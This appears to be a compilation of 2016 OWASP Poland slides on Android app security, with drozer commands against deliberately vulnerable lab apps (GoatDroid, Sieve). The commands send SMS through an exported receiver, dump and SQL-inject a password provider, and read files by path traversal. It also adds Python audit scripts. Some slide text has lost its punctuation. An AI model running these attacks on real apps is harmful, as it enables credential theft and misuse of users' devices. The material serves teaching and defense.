The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      // phoneNumber and message come straight from the incoming intent; the sender is never checked
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
Broadcast receivers: attacks
  run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Result: GoatDroid sends the attacker's message to the attacker's number on the user's behalf (and on the user's bill), without the attacking app needing SEND_SMS itself.
General defenses for app components
Applies to all the items above:
• Set the android:exported attribute to false (only code running under the same user ID as the app, i.e. the app itself, can then reach the component)
• Limit access with a permission on the component (android:permission), either a custom permission with protectionLevel="signature" or a system permission such as RECEIVE_SMS
• Use explicit intents for internal communication and do not trust the sender or the extras of an incoming intent without checking them
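A check for the first two defenses that can be run over any decoded manifest, as an added Python example (not a tool from the slides). It applies the platform's default-export rule: a component with an intent filter is exported unless android:exported="false", and a provider is exported by default when targetSdkVersion is below 17. The sample manifest is constructed for this example; only the receiver is the GoatDroid one shown above, the other components are made up.

```python
"""Flag exported components that carry no permission, straight from AndroidManifest.xml."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
LAUNCHER = "android.intent.category.LAUNCHER"

# Constructed manifest (decoded form, e.g. apktool output); only the receiver is from GoatDroid.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:debuggable="true">
    <activity android:name=".activities.Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS"/>
      </intent-filter>
    </receiver>
    <service android:name=".services.LocationService"/>
    <provider android:name=".providers.UserProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.users"/>
    <activity android:name=".activities.Admin" android:exported="true"
              android:permission="org.owasp.goatdroid.fourgoats.ADMIN"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute (ElementTree stores it as {ns}name)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(elem, target_sdk):
    """Default-export rule applied when android:exported is not set explicitly."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return target_sdk < 17          # providers were public by default before API 17
    return elem.find("intent-filter") is not None   # a filter makes the component reachable


def _is_launcher(elem):
    return any(_attr(cat, "name") == LAUNCHER
               for f in elem.findall("intent-filter") for cat in f.findall("category"))


def audit_manifest(xml_text):
    """Return (tag, android:name, issue) for every risky setting found."""
    root = ET.fromstring(xml_text)
    target_sdk = 1
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is not None:
        target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or _attr(uses_sdk, "minSdkVersion") or 1)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if (_attr(app, "debuggable") or "").lower() == "true":
        findings.append(("application", "", "android:debuggable=true (anyone with adb can attach)"))
    for elem in app.iter():
        if elem.tag not in COMPONENT_TAGS or not is_exported(elem, target_sdk):
            continue
        if _is_launcher(elem):
            continue                    # the launcher activity is meant to be public
        protected = any(_attr(elem, p) for p in ("permission", "readPermission", "writePermission"))
        if not protected:
            findings.append((elem.tag, _attr(elem, "name"), "exported without a permission"))
    return findings


if __name__ == "__main__":
    for tag, name, issue in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-45s %s" % (tag, name, issue))
```

Every hit still has to be judged by hand: an exported activity may be public on purpose, but an exported receiver that sends SMS, or a provider that hands out the user table, is exactly what drozer will find in the next step.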
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications.
• If you want to add anything important/interesting related to the topic, feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or a reversible encoding).
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores (shared preferences)
  – plain-text configuration files
  – cookie stores
  – the SD card (external storage is readable by every app that holds READ_EXTERNAL_STORAGE)
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing the application
• Analyze the package files at different stages:
  adb pull /data/data/<apk_package_name>
  (needs a rooted device; on a stock device use run-as for a debuggable app or adb backup if the app allows backups)
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (a device-admin app can require device encryption with DevicePolicyManager.setStorageEncryption)
• For databases consider SQLCipher for SQLite data encryption
• Ensure no shared preferences are created with MODE_WORLD_READABLE (or MODE_WORLD_WRITEABLE)
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – securing only part of the communication (e.g. only authentication)
  – lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know whether it is communicating with the proper server?
Cert pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      start_connection();
  else
      drop_connection();
Cert pinning - reality
• Researchers from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check whether all traffic is encrypted)
• Use MalloDroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
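What "correctly" and "incorrectly" look like side by side, as an added Python example using the standard ssl module (not from the slides; the Hannover findings concern Java TrustManager and HostnameVerifier code, and the Python settings below are their direct counterparts). `audit_context` is the check to run on any client configuration, and `pin_matches` is the pseudo-code pin comparison above done properly; the certificate bytes and pin value are constructed so the example runs offline.

```python
"""Strict vs. trust-everything TLS client settings, an audit of them, and a pin check."""
import hashlib
import hmac
import ssl


def strict_context():
    """What a mobile client should do: CA verification, hostname check, TLS 1.2 or newer."""
    ctx = ssl.create_default_context()              # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2    # refuse SSLv3 / TLS 1.0 / TLS 1.1
    return ctx


def trust_everything_context():
    """The broken pattern the Hannover study found (a no-op TrustManager in Java)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False                      # "accept all hostnames" (must come first)
    ctx.verify_mode = ssl.CERT_NONE                 # "trust all certificates"
    return ctx


def audit_context(ctx):
    """Return the list of findings for an SSLContext; an empty list means it passes."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: any certificate is accepted")
    if not ctx.check_hostname:
        findings.append("check_hostname is off: a valid cert for another host is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version below TLS 1.2: legacy protocols are negotiable")
    return findings


def pin_matches(cert_der, pinned_sha256_hex):
    """Pin comparison done properly: hash the DER bytes the peer presented
    (ssl.SSLSocket.getpeercert(binary_form=True)) and compare in constant time.
    A pin on the SubjectPublicKeyInfo survives certificate renewal; a pin on the
    whole certificate, as here, does not, so plan for rotation either way."""
    digest = hashlib.sha256(cert_der).hexdigest()
    return hmac.compare_digest(digest, pinned_sha256_hex)


# Constructed stand-in for a DER certificate, only to exercise pin_matches() offline.
FAKE_CERT_DER = b"\x30\x82\x01\x00constructed-cert-bytes"
PINNED = hashlib.sha256(FAKE_CERT_DER).hexdigest()

if __name__ == "__main__":
    print("strict:", audit_context(strict_context()))
    print("trust-all:", audit_context(trust_everything_context()))
    print("pin ok:", pin_matches(FAKE_CERT_DER, PINNED))
```

Pinning is in addition to, never instead of, normal chain validation: the pin check runs after the handshake has verified the certificate, otherwise a pinned-but-expired or revoked certificate is still accepted.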
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/framework puts sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious decision to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see whether any confidential data is sent via intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly with drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app (lock screen bypass): https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed; they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store the user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, etc.)
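A first pass over decompiled Java for the last two bullets, as an added Python example (not a tool from the slides). It greps for the javax.crypto call patterns behind weak or deprecated algorithms, ECB mode, static IVs and hardcoded key material; the Java lines are constructed for this example, and the rules are heuristics, so every hit still needs a human look.

```python
"""Grep-style review of decompiled Java for common cryptography mistakes."""
import re

RULES = [
    ("WEAK_CIPHER", re.compile(r'Cipher\.getInstance\(\s*"(?:DES|DESede|RC4|ARCFOUR|RC2|Blowfish)\b')),
    # "AES" with no mode means ECB on Android; "/ECB" is ECB spelled out
    ("ECB_MODE", re.compile(r'Cipher\.getInstance\(\s*"(?:AES|DES|DESede)(?:/ECB\b|")')),
    ("WEAK_HASH", re.compile(r'MessageDigest\.getInstance\(\s*"(?:MD2|MD4|MD5|SHA-?1)"')),
    ("STATIC_IV", re.compile(r'new IvParameterSpec\(\s*(?:new byte\[|"[^"]*"\.getBytes)')),
    # key material taken from a string literal or an ALL_CAPS constant
    ("HARDCODED_KEY", re.compile(r'new SecretKeySpec\(\s*(?:"[^"]*"|[A-Z][A-Z0-9_]*)\.getBytes')),
    ("HARDCODED_SECRET", re.compile(r'\w*(?:KEY|SECRET|PASSW|TOKEN)\w*\s*=\s*"[^"]{8,}"', re.I)),
]

# Constructed lines in the style of dex2jar + JD-GUI output.
SAMPLE_JAVA = """\
private static final String KEY = "SuperSecretKey!!";
Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
SecretKeySpec k = new SecretKeySpec(KEY.getBytes(), "AES");
MessageDigest md = MessageDigest.getInstance("MD5");
Cipher d = Cipher.getInstance("DES/CBC/PKCS5Padding");
IvParameterSpec iv = new IvParameterSpec(new byte[16]);
Cipher ok = Cipher.getInstance("AES/GCM/NoPadding");
SecretKey derived = factory.generateSecret(new PBEKeySpec(passphrase, salt, 100000, 256));
"""


def scan_source(text):
    """Return (line_number, rule, line) for every rule that fires on a line."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((no, rule, line.strip()))
    return findings


if __name__ == "__main__":
    for no, rule, line in scan_source(SAMPLE_JAVA):
        print("%3d %-16s %s" % (no, rule, line))
```

Run it over the whole tree JD-GUI or Luyten exported (os.walk over the .java files); the last two sample lines show what a clean result looks like: an AEAD mode and a key derived from a passphrase at runtime rather than shipped in the apk.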
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password that decrypts it in the code…
Broken Cryptography – real example
• NQ Vault (see "Cracking NQ Vault step by step" in the references)
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption (a key derived from the user's passphrase) instead
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – another application via an intent/content provider
  – a shared file
  – a server response
  – a third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX, a security feature that separates personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application, while the user thinks he is installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Be careful with intent filters: an implicit intent is delivered to whichever application registers a matching filter, and when several match the system displays a chooser dialog so the user picks the app. Sensitive data sent in an implicit intent can therefore end up in a malicious app; keep components that don't need to be public at exported="false" and give them no intent filter
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – verify whether a session expires (copy a cookie and try to use it after 30 minutes)
  – verify whether a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
  – verify whether you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time appropriately for your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawel.rzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APK Optic
  – Astro File Manager
• Using ADB (adb shell pm path <package> gives the location, then adb pull it)
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly (smali) code
• Why disassemble and not decompile? Decompilers fail or produce wrong code on obfuscated or unusual bytecode, while smali can always be produced, edited and rebuilt into an apk.
Decompiling
[Diagram: DEX → JAR → JAVA]
Decompiling - dex2jar
• dex2jar
  – converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – lets you use any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten
  – Java decompilers
  – combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but produce different OUTPUT
JD-GUI
Luyten
Disassembling
[Diagram: DEX → SMALI]
Disassembling
• Apktool
  – open source Java tool for reverse engineering Android apps
  – transforms binary Dalvik bytecode (dex) into smali source, and rebuilds an apk from edited smali
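Before feeding a classes.dex to dex2jar or apktool it is worth checking that the file really is a dex and has not been truncated or patched: the 0x70-byte header carries an Adler-32 checksum and a SHA-1 signature over the rest of the file. The parser below is an added Python example (not from the slides); build_minimal_dex() fabricates a header-only dex so the parser can be exercised offline, and dex_from_apk() is how you would get the real one out of an apk.

```python
"""Parse and verify the classes.dex header (added example, header-only dex constructed)."""
import hashlib
import struct
import zipfile
import zlib

HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678
FIELDS = ("file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
          "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
          "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
          "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
          "data_size", "data_off")


def parse_dex_header(data):
    """Decode the header and recompute the two integrity fields tamper checks rely on."""
    if len(data) < HEADER_SIZE or data[:4] != b"dex\n" or data[7] != 0:
        raise ValueError("not a dex file")
    magic, checksum, signature = struct.unpack_from("<8sI20s", data, 0)
    values = struct.unpack_from("<20I", data, 32)
    hdr = dict(zip(FIELDS, values))
    hdr["version"] = magic[4:7].decode("ascii")       # "035", "037", "038", ...
    hdr["checksum"] = checksum
    hdr["signature"] = signature.hex()
    # adler32 covers everything after the checksum field (offset 12);
    # SHA-1 covers everything after the signature field (offset 32)
    hdr["checksum_ok"] = (zlib.adler32(data[12:]) & 0xFFFFFFFF) == checksum
    hdr["signature_ok"] = hashlib.sha1(data[32:]).digest() == signature
    hdr["endian_ok"] = hdr["endian_tag"] == ENDIAN_CONSTANT
    return hdr


def build_minimal_dex(version=b"035"):
    """Fabricate a header-only dex (no code) with a correct checksum and signature."""
    values = [HEADER_SIZE, HEADER_SIZE, ENDIAN_CONSTANT] + [0] * 17
    body = struct.pack("<20I", *values)
    magic = b"dex\n" + version + b"\x00"
    signature = hashlib.sha1(body).digest()                 # over bytes [32:]
    checksum = zlib.adler32(signature + body) & 0xFFFFFFFF  # over bytes [12:]
    return struct.pack("<8sI20s", magic, checksum, signature) + body


def dex_from_apk(apk_path, name="classes.dex"):
    """An apk is a zip; the bytecode sits in classes.dex (classes2.dex, ... for multidex)."""
    with zipfile.ZipFile(apk_path) as z:
        return z.read(name)


if __name__ == "__main__":
    good = build_minimal_dex()
    print(parse_dex_header(good))
    tampered = good[:0x20] + b"\xff" + good[0x21:]   # flip a byte inside the signed region
    print("tampered checksum_ok:", parse_dex_header(tampered)["checksum_ok"])
```

A checksum or signature mismatch on a dex pulled from a device is a strong hint that the file was patched after build (by a repackaged malware sample or by your own smali edits before the tools fixed the header up); apktool and dx recompute both when they rebuild.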
Signing apk
• Using signapk.jar (a rebuilt apk must be re-signed before it installs, and it will carry your key, not the original developer's, so it cannot update the original app in place):
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo time
Demo: decompiling with Luyten
Demo: modifying smali files
Demo
Application Framework
• Activity Manager: manages the activity life cycle of applications
• Content Providers: manage data sharing between applications
• Telephony Manager: manages all voice calls
• Location Manager: location management using GPS or cell towers
• Resource Manager: manages the various types of resources we use in our application
Application layer
• SMS client app
• Dialer
• Web browser
• Contact manager
APK: how it works
Android Application Security
• Android sandbox
• Permission labels defined in AndroidManifest.xml
• Signature
• Install-time security decisions
• Android 6.0 security release
Android 6.0
• Runtime permissions
• Verified Boot
• Hardware-isolated security
• Fingerprints
• SD card adoption
• Clear-text traffic
• System hardening
• USB access control
Defense layers
Google Play
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps.
The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install.
Warn for or block Potentially Harmful Applications.
Over 10 million installs verified every day.
Verifying is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography and permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• passwords
• authentication tokens
• contacts
• communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing applications:
• How sensitive data is stored
  – isolation
  – privilege separation
• How sensitive data is transmitted
  – extra-device communication
  – inter-application communication
  – inter-component communication
Android Application Components
[Diagram: Activities, Services, Content providers, Broadcast receivers]
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers attacks: unrestricted access to app database
    dz> run scanner.provider.finduris -a com.mwr.example.sieve
    Accessible content URIs:
      content://com.mwr.example.sieve.DBContentProvider/Keys/
      content://com.mwr.example.sieve.DBContentProvider/Passwords
      content://com.mwr.example.sieve.DBContentProvider/Passwords/
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --vertical
Content providers attacks: SQL injection
    dz> run scanner.provider.injection -a com.mwr.example.sieve
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --selection "'"
    unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
    dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM Key--"
    | Password         | pin  |
    | thisismypassword | 9876 |
Content providers attacks: path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
    dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    127.0.0.1 localhost
    dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
